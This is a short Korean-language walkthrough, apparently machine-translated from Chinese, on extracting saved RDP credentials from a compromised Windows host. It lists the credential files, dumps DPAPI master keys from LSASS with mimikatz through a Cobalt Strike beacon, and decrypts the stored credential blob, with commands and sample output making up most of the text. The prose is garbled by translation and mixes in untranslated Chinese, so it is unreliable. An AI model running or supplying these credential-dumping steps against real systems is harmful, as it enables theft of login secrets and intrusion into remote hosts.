[호스트] RDP 암호 자격 증명 저장 원격 호스트 침투를 얻을 수

원격 RDP 호스트 자격 증명을 간단한 기록을 가져옵니다.

 

Windows 디렉터리는 RDP 자격 증명을 저장 :

C:\Users\用户名\AppData\Local\Microsoft\Credentials

명령 행을 통해 사용 가능, 실행 :

cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force

참고 : cmdkey / list 명령은 항상 결과없이 수행하는 시스템에서, 세션 세션에서 수행 할 수 있습니다.

mimikatz 코발트 파업을 사용하면 masterkey입니다 및 pbData의 다음 부분을 얻을 수 있습니다

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID

출력은 유사해야

**BLOB**
  dwVersion : 00000001 - 1
  guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
  dwFlags : 20000000 - 536870912 (system ; )
  dwDescriptionLen : 00000012 - 18
  szDescription : 本地凭据数据

  algCrypt : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen : 00000100 - 256
  dwSaltLen : 00000020 - 32
  pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f
  dwHmacKeyLen : 00000000 - 0
  pbHmackKey :
  algHash : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen : 00000200 - 512
  dwHmac2KeyLen : 00000020 - 32
  pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233
  dwDataLen : 000000c0 - 192
  pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d
  dwSignLen : 00000040 - 64
  pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655

우려 guidMasterKey이 암호를 해독하는 데 필요한 핵심이다 pbData 우리가 데이터를 해독 할 필요가있다, guidMasterKey, pbData입니다. 다음은 LSASS 캐시에이 키를 우리가 얻을 SeDebugPrivilege 권한이 쓰여지고 잇음을 사용할 수 있도록이 있었다.

beacon> mimikatz !sekurlsa::dpapi

mimikatz !sekurlsa::dpapi

     [00000001]
     * GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
     * Time : 2020/1/3 8:05:02
     * MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148
     * sha1(key) : 3e6dc57a0fe****a902cfaf617b1322
     [00000002]
     * GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}
     * Time : 2020/1/3 8:05:02
     * MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202
     * sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb

그런 다음 로컬 집행에 자격 증명을 저장

mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"